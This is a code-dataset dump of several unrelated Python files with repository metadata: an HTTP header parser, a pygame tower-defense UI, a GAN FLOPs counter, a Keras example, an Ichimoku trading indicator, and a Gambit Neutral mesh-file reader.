""
tl = string.split(str, '-')
for i in range(len(tl)):
tl[i] = string.capitalize(tl[i])
return string.join(tl, '-')
#-----------------------------------------------------------------------
# some helper classes
#-----------------------------------------------------------------------
class HTTP_HEAD:
""
pass
#-------------------------------
def __init__(self, head_str):
""
self.head_source = ''
self.params = None
self.fields = None
self.order_list = []
self.head_source = head_str
head_str = string.strip(head_str)
records = string.split(head_str, '\012')
# Dealing with response line
#fields = string.split(records[0], ' ', 2)
t = string.split(string.strip(records[0]))
fields = t[:2] + [string.join(t[2:])]
self.fields = []
for i in fields:
self.fields.append(string.strip(i))
# Dealing with params
params = {}
order_list = []
for i in records[1:]:
parts = string.split(string.strip(i), ':', 1)
pname = string.lower(string.strip(parts[0]))
if not params.has_key(pname):
params[pname] = []
order_list.append(string.lower(pname))
try:
params[pname].append(string.strip(parts[1]))
except:
msg = "ERROR: Exception in head parsing. ValueName: '%s'" % pname
#print msg
self.debug(msg)
self.params = params
self.order_list = order_list
#-------------------------------
def debug(self, message):
""
try:
f = open(http_debug_file_name, 'a')
f.write(message)
f.write('\n=====\n')
f.write(self.head_source)
f.close()
except IOError:
pass
# Yes, yes, I know, this is just sweeping it under the rug...
# TODO: implement a persistent filehandle for logging debug messages to.
#-------------------------------
def copy(self):
""
import copy
return copy.deepcopy(self)
#-------------------------------
def get_param_values(self, param_name):
""
param_name = string.lower(param_name)
if self.params.has_key(param_name):
return self.params[param_name]
else:
return []
#-------------------------------
def del_param(self, param_name):
""
param_name = string.lower(param_name)
if self.params.has_key(param_name): del self.params[param_name]
#-------------------------------
def has_param(self, param_name):
""
param_name = string.lower(param_name)
return self.params.has_key(param_name)
#-------------------------------
def add_param_value(self, param_name, value):
""
param_name = string.lower(param_name)
if not self.params.has_key(param_name):
self.params[param_name] = []
if param_name not in self.order_list:
self.order_list.append(param_name)
self.params[param_name].append(value)
#-------------------------------
def replace_param_value(self, param_name, value):
""
self.del_param(param_name)
self.add_param_value(param_name, value)
#-------------------------------
def __repr__(self, delimiter='\n'):
""
res = ''
cookies = ''
res = string.join(self.fields, ' ') + '\n'
for i in self.order_list:
if self.params.has_key(i):
if i == 'cookie':
for k in self.params[i]:
cookies = cookies + capitalize_value_name(i) + ': ' + k + '\n'
else:
for k in self.params[i]:
res = res + capitalize_value_name(i) + ': ' + k + '\n'
res = res + cookies
res = res + '\n'
return res
#-------------------------------
def send(self, socket):
""
#"""
res = ''
cookies = ''
res = string.join(self.fields, ' ') + '\015\012'
for i in self.order_list:
if self.params.has_key(i):
if i == 'cookie':
for k in self.params[i]:
cookies = cookies + capitalize_value_name(i) + ': ' + k + '\015\012'
else:
for k in self.params[i]:
res = res + capitalize_value_name(i) + ': ' + k + '\015\012'
res = res + cookies
res = res + '\015\012'
#"""
#res = self.__repr__('\015\012')
# NOTE!!! 0.9.1 worked, 0.9.5 and 0.9.7 did not with MSN Messenger.
# We had problem here that prevent MSN Messenger from working.
# Some work is needed to make __rerp__ working instead of current code..
try:
#socket.send(self.head_source)
socket.send(res)
# self.debug(res)
return 1
except:
return 0
#-----------------------------------------------------------------------
class HTTP_SERVER_HEAD(HTTP_HEAD):
#-------------------------------
def get_http_version(self):
""
return self.fields[0]
#-------------------------------
def get_http_code(self):
""
return self.fields[1]
#-------------------------------
def get_http_message(self):
""
return self.fields[2]
#-----------------------------------------------------------------------
class HTTP_CLIENT_HEAD(HTTP_HEAD):
#-------------------------------
def get_http_version(self):
""
return self.fields[2]
#-------------------------------
def get_http_method(self):
""
return self.fields[0]
#-------------------------------
def get_http_url(self):
""
return self.fields[1]
#-------------------------------
def set_http_url(self, new_url):
""
self.fields[1] = new_url
#-------------------------------
# There is some problem with www request header...
# not all servers want to answer to requests with full url in request
# but want have net location in 'Host' value and path in url.
def make_right_header(self):
""
url_tuple = urlparse.urlparse(self.get_http_url())
net_location = url_tuple[1]
self.replace_param_value('Host', net_location)
path = urlparse.urlunparse(tuple(['', ''] + list(url_tuple[2:])))
self.set_http_url(path)
#-------------------------------
def get_http_server(self):
""
# trying to get host from url
url_tuple = urlparse.urlparse(self.get_http_url())
net_location = url_tuple[1]
# if there was no host in url then get it from 'Host' value
if not net_location:
net_location = self.get_param_values('Host')[0]
if not net_location:
net_location = 'localhost'
# trying to parse user:passwd@www.some.domain:8080
# is it needed?
if '@' in net_location:
cred, net_location = string.split(net_location, '@')
if ':' in net_location:
server, port = string.split(net_location, ':')
port = int(port)
else:
server = net_location
port = 80
return server, port
| 0 | 2,177 | 44 |
c98db0b3f4e375dd6550c7913eddb684658456a2 | 56 | py | Python | app/db/enums/__init__.py | maxzhenzhera/my_vocab_backend | 2e9f968374e0bc2fcc0ae40830ca40f3cf5754d1 | [
"MIT"
] | 1 | 2021-11-18T16:25:22.000Z | 2021-11-18T16:25:22.000Z | app/db/enums/__init__.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | null | null | null | app/db/enums/__init__.py | Max-Zhenzhera/my_vocab_backend | f93d0c7c7f4a45fce47eb7ce74cfcda195b13a72 | [
"MIT"
] | null | null | null | from .language import Language
__all__ = ['Language']
| 11.2 | 30 | 0.732143 | from .language import Language
__all__ = ['Language']
| 0 | 0 | 0 |
9b8d29dc80fd2145ebde1c69bcc20726150589e9 | 51 | py | Python | venv/lib/python3.9/site-packages/__init__.py | lyushher/YBrowser | 49ec6e5e60d645ea80d81860f77ca6b06d5e20aa | [
"MIT"
] | 9 | 2021-07-25T22:45:52.000Z | 2021-11-13T03:39:05.000Z | venv/lib/python3.9/site-packages/__init__.py | lyushher/YBrowser | 49ec6e5e60d645ea80d81860f77ca6b06d5e20aa | [
"MIT"
] | null | null | null | venv/lib/python3.9/site-packages/__init__.py | lyushher/YBrowser | 49ec6e5e60d645ea80d81860f77ca6b06d5e20aa | [
"MIT"
] | null | null | null | from . import scraper
from .browser import Browser
| 17 | 28 | 0.803922 | from . import scraper
from .browser import Browser
| 0 | 0 | 0 |
83a9506e461a3c6e6df00f8d73bbeae769352b0b | 4,765 | py | Python | src/ui.py | PlayFrog/frog-td | 8e9c5aa5276b3a4ca2f743e7f833e083747ad3b4 | [
"MIT"
] | null | null | null | src/ui.py | PlayFrog/frog-td | 8e9c5aa5276b3a4ca2f743e7f833e083747ad3b4 | [
"MIT"
] | 9 | 2021-10-08T00:03:46.000Z | 2021-10-21T01:35:26.000Z | src/ui.py | PlayFrog/frog-td | 8e9c5aa5276b3a4ca2f743e7f833e083747ad3b4 | [
"MIT"
] | null | null | null | import pygame as pg
import constants
from state import GameState
from tower import Tower
| 41.798246 | 109 | 0.612802 | import pygame as pg
import constants
from state import GameState
from tower import Tower
class UI:
def __init__(self, screen: pg.Surface, fonts: list[pg.font.Font]):
self.screen = screen
self.screen.fill('black')
self.fonts = fonts
self.show_instructions = False
self.warning = None
def display_information_panel(self, state: GameState, available_coins: int,
rounds_complete: int):
info_panel_surf = pg.Surface(
(constants.SCREEN_SIZE[0], constants.INFO_PANEL_HEIGHT))
padding = 4
coin_text = self.fonts[0].render(
f'Moedas disponíveis: {available_coins}', False, constants.COIN_COLOR)
info_panel_surf.blit(coin_text, (padding, padding))
game_mode_text = self.fonts[0].render(
f'Modo: {state}', False, constants.WHITE)
info_panel_surf.blit(
game_mode_text, (padding, constants.INFO_PANEL_HEIGHT // 2 + padding))
round_text = self.fonts[0].render(
f"Rounds completos: {rounds_complete}", False, constants.WHITE)
info_panel_surf.blit(
round_text, (constants.SCREEN_SIZE[0] -
(round_text.get_width() + padding), padding)
)
if self.warning:
warning_text = self.fonts[0].render(
self.warning, False, constants.RED)
info_panel_surf.blit(
warning_text, (constants.SCREEN_SIZE[0] - (
warning_text.get_width() + padding), constants.INFO_PANEL_HEIGHT // 2 + padding)
)
self.screen.blit(info_panel_surf, (0, constants.SCREEN_SIZE[1]))
def display_instructions_sign(self):
inst_sign_surf = pg.Surface(
(constants.SCREEN_SIZE[0], constants.INSTRUCTIONS_SIGN_HEIGHT))
inst_sign_surf.fill('black')
text = self.fonts[0].render(
"Pressione 'h' para ver as instruções", False, constants.ENEMY_PATH_COLOR)
inst_sign_surf.blit(text, (constants.SCREEN_SIZE[0] // 2 - text.get_width(
) // 2, constants.INSTRUCTIONS_SIGN_HEIGHT // 2 - text.get_height() // 2))
self.screen.blit(
inst_sign_surf, (0, constants.SCREEN_SIZE[1] + constants.INFO_PANEL_HEIGHT))
def display_tower_info(self, tower: Tower):
tower_info_surf = pg.Surface(
(constants.SCREEN_SIZE[0], constants.INSTRUCTIONS_SIGN_HEIGHT))
tower_info_surf.fill('black')
padding = 4
name = self.fonts[1].render(
tower.name, False, constants.WHITE)
tower_info_surf.blit(name, (constants.SCREEN_SIZE[0] // 2 - name.get_width(
) // 2, padding))
data = self.fonts[0].render(
f"Preço: {tower.price} Dano: {tower.damage} Área: {tower.range} Velocidade: {tower.speed}",
False, constants.ENEMY_PATH_COLOR)
tower_info_surf.blit(data, (constants.SCREEN_SIZE[0] // 2 - data.get_width(
) // 2, name.get_height() + padding * 2))
self.screen.blit(
tower_info_surf, (0, constants.SCREEN_SIZE[1] + constants.INFO_PANEL_HEIGHT))
def display_instructions_modal(self):
instructions_modal = pg.Surface(constants.INSTRUCTIONS_MODAL_SIZE)
instructions_modal.fill(constants.GRAY)
padding_y = 4
padding_x = 16
title = self.fonts[1].render("Instruções", False, constants.WHITE)
instructions_modal.blit(title,
(constants.INSTRUCTIONS_MODAL_SIZE[0] // 2 - title.get_width() // 2,
padding_y))
for i, txt in enumerate(constants.INSTRUCTIONS):
instruction_txt = self.fonts[0].render(
txt, False, constants.WHITE)
instructions_modal.blit(
instruction_txt, (padding_x, title.get_height() + padding_y * (i + 2) +
instruction_txt.get_height() * (i + 1)))
self.screen.blit(instructions_modal,
(constants.SCREEN_SIZE[0] // 2 - constants.INSTRUCTIONS_MODAL_SIZE[0] // 2,
constants.SCREEN_SIZE[1] // 2 - constants.INSTRUCTIONS_MODAL_SIZE[1] // 2)
)
def set_warning(self, message: str):
self.warning = message
def update(self, state: GameState, available_coins: int, rounds_complete: int,
selected_tower: Tower):
self.display_information_panel(state, available_coins, rounds_complete)
if self.show_instructions:
self.display_instructions_modal()
if state == GameState.BUILDING_TOWER:
self.display_tower_info(selected_tower)
else:
self.display_instructions_sign()
| 4,482 | -12 | 211 |
fc5253d197cc9da32d095fb6b7be586333917faa | 1,903 | py | Python | flops.py | Pragyanstha/SummerCamp2021 | caa8bba64020ba52bdef2b23a7a54de93e93b8af | [
"MIT"
] | null | null | null | flops.py | Pragyanstha/SummerCamp2021 | caa8bba64020ba52bdef2b23a7a54de93e93b8af | [
"MIT"
] | null | null | null | flops.py | Pragyanstha/SummerCamp2021 | caa8bba64020ba52bdef2b23a7a54de93e93b8af | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# @Date : 2019-10-01
# @Author : Xinyu Gong (xy_gong@tamu.edu)
# @Link : None
# @Version : 0.0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cfg
import models_search
import datasets
from functions import train, validate, LinearLrDecay, load_params, copy_params, cur_stages
from utils.utils import set_log_dir, save_checkpoint, create_logger
from utils.inception_score import _init_inception
from utils.fid_score import create_inception_graph, check_or_download_inception
import torch
import os
import numpy as np
import torch.nn as nn
from tensorboardX import SummaryWriter
from tqdm import tqdm
from copy import deepcopy
from adamw import AdamW
import random
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
from models_search.ViT_8_8 import matmul, count_matmul
if __name__ == '__main__':
main()
| 29.734375 | 90 | 0.736206 | # -*- coding: utf-8 -*-
# @Date : 2019-10-01
# @Author : Xinyu Gong (xy_gong@tamu.edu)
# @Link : None
# @Version : 0.0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cfg
import models_search
import datasets
from functions import train, validate, LinearLrDecay, load_params, copy_params, cur_stages
from utils.utils import set_log_dir, save_checkpoint, create_logger
from utils.inception_score import _init_inception
from utils.fid_score import create_inception_graph, check_or_download_inception
import torch
import os
import numpy as np
import torch.nn as nn
from tensorboardX import SummaryWriter
from tqdm import tqdm
from copy import deepcopy
from adamw import AdamW
import random
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
from models_search.ViT_8_8 import matmul, count_matmul
def main():
args = cfg.parse_args()
torch.cuda.manual_seed(args.random_seed)
torch.cuda.manual_seed_all(args.random_seed)
np.random.seed(args.random_seed)
random.seed(args.random_seed)
torch.backends.cudnn.deterministic = True
# set tf env
# _init_inception()
# inception_path = check_or_download_inception(None)
# create_inception_graph(inception_path)
# # import network
gen_net = eval('models_search.'+args.gen_model+'.Generator')(args=args).cuda()
dis_net = eval('models_search.'+args.dis_model+'.Discriminator')(args=args).cuda()
gen_net.set_arch(args.arch, cur_stage=2)
import thop, math
dummy_data = (1, 1024)
macs, params = thop.profile(gen_net, inputs=(torch.randn(dummy_data).cuda(), ),
custom_ops={matmul: count_matmul})
flops, params = thop.clever_format([macs, params], "%.3f")
print('Flops (GB):\t', flops)
print('Params Size (MB):\t', params)
if __name__ == '__main__':
main()
| 944 | 0 | 23 |
65da5a2f28ead7b6339a00c7a6352c9c5cd8ef96 | 605 | py | Python | src/analysis/deep_analysis/convnet.py | EstevaoVieira/spikelearn | 060206558cc37c31493f1c9f01412d90375403cb | [
"MIT"
] | null | null | null | src/analysis/deep_analysis/convnet.py | EstevaoVieira/spikelearn | 060206558cc37c31493f1c9f01412d90375403cb | [
"MIT"
] | null | null | null | src/analysis/deep_analysis/convnet.py | EstevaoVieira/spikelearn | 060206558cc37c31493f1c9f01412d90375403cb | [
"MIT"
] | null | null | null | from keras.layers import Input, Dense
from keras.models import Model
# This returns a tensor
inputs = Input(shape=(784,))
# a layer instance is callable on a tensor, and returns a tensor
x = Dense(64, activation='relu')(inputs)
x = Dense(64, activation='relu')(x)
predictions = Dense(10, activation='softmax')(x)
# This creates a model that includes
# the Input layer and three Dense layers
model = Model(inputs=inputs, outputs=predictions)
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels) # starts training
| 31.842105 | 64 | 0.719008 | from keras.layers import Input, Dense
from keras.models import Model
# This returns a tensor
inputs = Input(shape=(784,))
# a layer instance is callable on a tensor, and returns a tensor
x = Dense(64, activation='relu')(inputs)
x = Dense(64, activation='relu')(x)
predictions = Dense(10, activation='softmax')(x)
# This creates a model that includes
# the Input layer and three Dense layers
model = Model(inputs=inputs, outputs=predictions)
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels) # starts training
| 0 | 0 | 0 |
5e8c4524180be5fac7edb4be49f28a653753cfa2 | 6,512 | py | Python | app/analyzers/indicators/ichimoku.py | rd-mg/crypto-signal | 03014d60cf345e89a6e8558f648a84d3ddb94400 | [
"MIT"
] | 50 | 2020-12-02T11:41:31.000Z | 2022-03-25T22:14:02.000Z | app/analyzers/indicators/ichimoku.py | rd-mg/crypto-signal | 03014d60cf345e89a6e8558f648a84d3ddb94400 | [
"MIT"
] | 45 | 2020-12-02T13:02:53.000Z | 2022-03-20T21:25:14.000Z | app/analyzers/indicators/ichimoku.py | rd-mg/crypto-signal | 03014d60cf345e89a6e8558f648a84d3ddb94400 | [
"MIT"
] | 39 | 2020-12-30T20:59:28.000Z | 2022-03-19T19:45:06.000Z | """ Ichimoku Indicator
"""
import math
import numpy
import pandas
from talib import abstract
from analyzers.utils import IndicatorUtils
from importlib import import_module
| 47.532847 | 151 | 0.603962 | """ Ichimoku Indicator
"""
import math
import numpy
import pandas
from talib import abstract
from analyzers.utils import IndicatorUtils
from importlib import import_module
class Ichimoku(IndicatorUtils):
def analyze(self, historical_data, tenkansen_period, kijunsen_period, senkou_span_b_period, custom_strategy=None,
signal=['tenkansen', 'kijunsen'], hot_thresh=None, cold_thresh=None, chart=None):
"""Performs an ichimoku cloud analysis on the historical data
Args:
historical_data (list): A matrix of historical OHCLV data.
signal (list, optional): Defaults to tenkansen and kijunsen. The indicator
line to check hot/cold against.
hot_thresh (float, optional): Defaults to None. The threshold at which this might be
good to purchase.
cold_thresh (float, optional): Defaults to None. The threshold at which this might be
good to sell.
tenkansen_period (int, optional)
kijunsen_period (int, optional)
senkou_span_b_period (int, optional)
custom_strategy (string, optional): Defaults to None. Name of the custom strategy. The file name and class name
should have the same name as the custom strategy.
Returns:
pandas.DataFrame: A dataframe containing the indicators and hot/cold values.
"""
dataframe = self.convert_to_dataframe(historical_data)
ichimoku_columns = {
'tenkansen': [numpy.nan] * dataframe.index.shape[0],
'kijunsen': [numpy.nan] * dataframe.index.shape[0],
'leading_span_a': [numpy.nan] * dataframe.index.shape[0],
'leading_span_b': [numpy.nan] * dataframe.index.shape[0],
'chikou_span' : [numpy.nan] * dataframe.index.shape[0]
}
ichimoku_values = pandas.DataFrame(ichimoku_columns,
index=dataframe.index
)
# value calculations
low_tenkansen = dataframe['low'].rolling(window=tenkansen_period).min()
low_kijunsen = dataframe['low'].rolling(window=kijunsen_period).min()
low_senkou = dataframe['low'].rolling(
window=senkou_span_b_period).min()
high_tenkansen = dataframe['high'].rolling(
window=tenkansen_period).max()
high_kijunsen = dataframe['high'].rolling(window=kijunsen_period).max()
high_senkou = dataframe['high'].rolling(
window=senkou_span_b_period).max()
chikou_span_delay = 26
ichimoku_values['chikou_span'] = dataframe['close'].shift(-chikou_span_delay)
ichimoku_values['tenkansen'] = (low_tenkansen + high_tenkansen) / 2
ichimoku_values['kijunsen'] = (low_kijunsen + high_kijunsen) / 2
ichimoku_values['leading_span_a'] = (
(ichimoku_values['tenkansen'] + ichimoku_values['kijunsen']) / 2)
ichimoku_values['leading_span_b'] = (high_senkou + low_senkou) / 2
ichimoku_values['is_hot'] = False
ichimoku_values['is_cold'] = False
try:
# add time period for cloud offset
## if cloud discplacement changed the ichimuko plot will be off ##
cloud_displacement = 26
last_time = dataframe.index[-1]
timedelta = dataframe.index[1] - dataframe.index[0]
newindex = pandas.date_range(last_time + timedelta,
freq=timedelta,
periods=cloud_displacement)
ichimoku_values = ichimoku_values.append(
pandas.DataFrame(index=newindex))
# cloud offset
ichimoku_values['leading_span_a'] = ichimoku_values['leading_span_a'].shift(
cloud_displacement)
ichimoku_values['leading_span_b'] = ichimoku_values['leading_span_b'].shift(
cloud_displacement)
if chart == None:
if custom_strategy == None:
leading_span_hot = False
leading_span_cold = False
tk_cross_hot = False
tk_cross_cold = False
tk_cross_enabled = (('tenkansen' and 'kijunsen') in signal)
leading_span_enabled = (('leading_span_a' and 'leading_span_b') in signal)
date = dataframe.index[-1]
leading_span_date = ichimoku_values.index[-1]
if tk_cross_enabled:
tk_cross_hot = ichimoku_values['tenkansen'][date] > ichimoku_values['kijunsen'][date]
tk_cross_cold = ichimoku_values['tenkansen'][date] < ichimoku_values['kijunsen'][date]
if leading_span_enabled:
leading_span_hot = ichimoku_values['leading_span_a'][leading_span_date] > ichimoku_values['leading_span_b'][leading_span_date]
leading_span_cold = ichimoku_values['leading_span_a'][leading_span_date] < ichimoku_values['leading_span_b'][leading_span_date]
if hot_thresh:
ichimoku_values.at[date, 'is_hot'] = tk_cross_hot or leading_span_hot
if cold_thresh:
ichimoku_values.at[date, 'is_cold'] = tk_cross_cold or leading_span_cold
else:
module = import_module("user_data.strategies." + custom_strategy)
attr = getattr(module, custom_strategy)
custom_hot, custom_cold = attr.analyze(ichimoku_values, dataframe)
date = dataframe.index[-1]
if hot_thresh:
ichimoku_values.at[date, 'is_hot'] = custom_hot
if cold_thresh:
ichimoku_values.at[date, 'is_cold'] = custom_cold
# Undo shifting in order to have the values aligned for displaying
ichimoku_values['chikou_span'] = dataframe['close']
ichimoku_values['leading_span_a'] = ichimoku_values['leading_span_a'].shift(-cloud_displacement)
ichimoku_values['leading_span_b'] = ichimoku_values['leading_span_b'].shift(-cloud_displacement)
ichimoku_values.dropna(how='any', inplace=True)
except Exception as e:
print('Error running ichimoku analysis: {}'.format(e))
return ichimoku_values
| 0 | 6,313 | 23 |
6b4d04e3e45c02d8ec3c966574f5be9c4f848e90 | 29,131 | py | Python | solvcon/io/gambit.py | j8xixo12/solvcon | a8bf3a54d4b1ed91d292e0cdbcb6f2710d33d99a | [
"BSD-3-Clause"
] | 16 | 2015-12-09T02:54:42.000Z | 2021-04-20T11:26:39.000Z | solvcon/io/gambit.py | j8xixo12/solvcon | a8bf3a54d4b1ed91d292e0cdbcb6f2710d33d99a | [
"BSD-3-Clause"
] | 95 | 2015-12-09T00:49:40.000Z | 2022-02-14T13:34:55.000Z | solvcon/io/gambit.py | j8xixo12/solvcon | a8bf3a54d4b1ed91d292e0cdbcb6f2710d33d99a | [
"BSD-3-Clause"
] | 13 | 2015-05-08T04:16:42.000Z | 2021-01-15T09:28:06.000Z | # -*- coding: UTF-8 -*-
#
# Copyright (c) 2008, Yung-Yu Chen <yyc@solvcon.net>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Gambit Neutral file.
"""
from .core import FormatIO
class ElementGroup(object):
"""
One single element group information in Gambit Neutral file.
@ivar ngp: element group index (1-based).
@type ngp: int
@ivar nelgp: number elements in this group.
@type nelgp: int
@ivar mtyp: material type (0: undefined, 1: conjugate, 2: fluid, 3: porous,
4: solid, 5: deformable).
@type mtyp: int
@ivar nflags: number of solver dependent flags.
@type nflags: int
@ivar solver: array of solver dependent flags of shape of (nflags).
@type solver: numpy.ndarray
@ivar elems: elements array of shape of (nelgp).
@type elems: numpy.ndarray
"""
def _parse(self, data):
"""
Parse given string data for element group. Set all instance variables.
@param data: string data for element group.
@type data: string
@return: nothing
"""
from numpy import fromstring
# parse header.
control, enttype, solver, data = data.split('\n', 3)
# parse control.
self.ngp, self.nelgp, self.mtyp, self.nflags = [
int(val) for val in control.split()[1::2]]
# get name.
self.elmmat = enttype.strip()
# get solver flags.
self.solver = fromstring(solver, dtype='int32', sep=' ')
# parse into array and renumber.
self.elems = fromstring(data, dtype='int32', sep=' ')-1
class BoundaryCondition(object):
"""
Hold boundary condition values.
@cvar CLFCS_RMAP: map clfcs definition back from block object to neutral
object.
@type CLFCS_RMAP: dict
@ivar name: name of boundary condition.
@type name: str
@ivar itype: type of data (0: nodal, 1: elemental).
@type itype: int
@ivar nentry: number of entry (nodes or elements/cells).
@type nentry: int
@ivar nvalues: number of values for each data record.
@type nvalues: int
@ivar ibcode: 1D array of boundary condition code.
@type ibcode: numpy.ndarray
@ivar values: array of values attached to each record.
@type values: numpy.ndarray
"""
def _parse(self, data):
"""
Parse given data string to boundary condition set. Set all instance
variables.
@param data: string data for boundary condition set.
@type data: str
@return: nothing
"""
from numpy import fromstring
# parse header.
header, data = data.split('\n', 1)
self.name = header[:32].strip()
tokens = fromstring(header[32:], dtype='int32', sep=' ')
self.itype, self.nentry, self.nvalues = tokens[:3]
self.ibcode = tokens[3:].copy()
# parse entries.
if self.itype == 0: # for nodes.
arr = fromstring(data, dtype='int32', sep=' ').reshape(
(self.nentry, self.nvalues+1))
self.elems = (arr[:,0]-1).copy()
arr = fromstring(data, dtype='float64', sep=' ').reshape(
(self.nentry, self.nvalues+1))
self.values = (arr[:,1:]).copy()
elif self.itype == 1: # for elements/cells.
arr = fromstring(data, dtype='int32', sep=' ').reshape(
(self.nentry, self.nvalues+3))
self.elems = arr[:,:3].copy()
self.elems[:,0] -= 1
arr = fromstring(data, dtype='float64', sep=' ').reshape(
(self.nentry, self.nvalues+3))
self.values = (arr[:,3:]).copy()
else:
raise ValueError("itype has to be either 0/1, but get %d" %
self.itype)
# define map for clfcs (from block to neu).
CLFCS_RMAP = {}
# tpn=1: edge.
CLFCS_RMAP[1] = [1,2]
# tpn=2: quadrilateral.
CLFCS_RMAP[2] = [1,2,3,4]
# tpn=3: triangle.
CLFCS_RMAP[3] = [1,2,3]
# tpn=4: hexahedron.
CLFCS_RMAP[4] = [5,2,6,4,1,3]
# tpn=5: tetrahedron.
CLFCS_RMAP[5] = [1,2,4,3]
# tpn=6: prism.
CLFCS_RMAP[6] = [4,5,3,1,2]
# tpn=6: pyramid.
CLFCS_RMAP[7] = [5,2,3,4,1]
def tobc(self, blk):
"""
Extract gambit boundary condition information from self into BC object.
Only process element/cell type of (gambit) boundary condition, and
return None while nodal BCs encountered.
@param blk: Block object for reference, nothing will be altered.
@type blk: solvcon.block.Block
@return: generic BC object.
@rtype: solvcon.boundcond.BC
"""
from numpy import empty
from ..boundcond import BC
clfcs_rmap = self.CLFCS_RMAP
# process only element/cell type of bc.
if self.itype != 1:
return None
# extrace boundary face list.
facn = empty((self.nentry,3), dtype='int32')
facn.fill(-1)
ibnd = 0
for entry in self.elems:
icl, nouse, it = entry[:3]
tpn = blk.cltpn[icl]
facn[ibnd,0] = blk.clfcs[icl, clfcs_rmap[tpn][it-1]]
ibnd += 1
# craft BC object.
bc = BC(fpdtype=blk.fpdtype)
bc.name = self.name
slct = facn[:,0].argsort() # sort face list for bc object.
bc.facn = facn[slct]
bc.value = self.values[slct]
# finish.
return bc
class GambitNeutralParser(object):
"""
Parse and store information of a Gambit Neutral file.
@ivar data: data to be parsed.
@type data: str
@ivar neu: GambitNeutral object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNeutral
"""
def __init__(self, data, neu):
"""
@param data: data to be parsed.
@type data: str
@param neu: GambitNeutral object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNeutral
"""
self.data = data
self.neu = neu
processors = {}
def _control_info(data, neu):
"""
Take string data for "CONTROL INFO" and parse it to GambitNeutral
object. Set:
- header
- title
- data_source
- numnp
- nelem
- ngrps
- nbsets
- ndfcd
- ndfvl
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring
data = data.rstrip()
records = data.splitlines()
neu.header = records[1].strip()
neu.title = records[2].strip()
neu.data_source = records[3].strip()
values = fromstring(records[6], dtype='int32', sep=' ')
neu.numnp, neu.nelem, neu.ngrps, \
neu.nbsets, neu.ndfcd, neu.ndfvl = values
processors['CONTROL INFO'] = _control_info
def _nodal_coordinate(data, neu):
"""
Take string data for "NODAL COORDINATES" and parse it to GambitNuetral
object. Set:
- nodes
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring, empty
# discard header.
data = data.split('\n', 1)[-1]
# parse into array and reshape to 2D array.
nodes = fromstring(data, dtype='float64', sep=' ')
nodes = nodes.reshape((neu.numnp, (neu.ndfcd+1)))
# renumber according to first value of each line.
# NOTE: unused number contains garbage.
number = nodes[:,0].astype(int) - 1
newnodes = empty((number.max()+1,neu.ndfcd))
newnodes[number] = nodes[number,1:]
# set result to neu.
neu.nodes = newnodes
processors['NODAL COORDINATE'] = _nodal_coordinate
def _elements_cells(data, neu):
"""
Take string data for "ELEMENTS/CELLS" and parse it to GambitNeutral
object. Set:
- elems
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring, empty
# discard header.
data = data.split('\n', 1)[-1]
# parse into array.
serial = fromstring(data, dtype='int32', sep=' ')
# parse element data -- 1st pass:
# element index, shape, and number of nodes.
meta = empty((neu.nelem, 3), dtype='int32')
ielem = 0
ival = 0
while ielem < neu.nelem:
meta[ielem,:] = serial[ival:ival+3]
ival += 3+meta[ielem,2]
ielem += 1
# parse element data -- 2nd pass:
# node definition.
maxnnode = meta[:,2].max()
elems = empty((neu.nelem, maxnnode+2), dtype='int32')
ielem = 0
ival = 0
while ielem < neu.nelem:
elems[ielem,2:2+meta[ielem,2]] = serial[ival+3:ival+3+meta[ielem,2]]
ival += 3+meta[ielem,2]
ielem += 1
elems[:,:2] = meta[:,1:] # copy the first two columns from meta.
elems[:,2:] -= 1 # renumber node indices in elements.
# set result to neu.
neu.elems = elems
processors['ELEMENTS/CELLS'] = _elements_cells
def _element_group(data, neu):
"""
Take string data for "ELEMENTS GROUP" and parse it to GambitNeutral
object. Set:
- grps
@param data: sectional data.
@type data: str
@param neu: object to be saved.
@type neu: solvcon.io.gambit.neutral.GambitNetral
@return: nothing
"""
from numpy import fromstring, empty
# discard header.
data = data.split('\n', 1)[-1]
# build group.
neu.grps.append(ElementGroup(data))
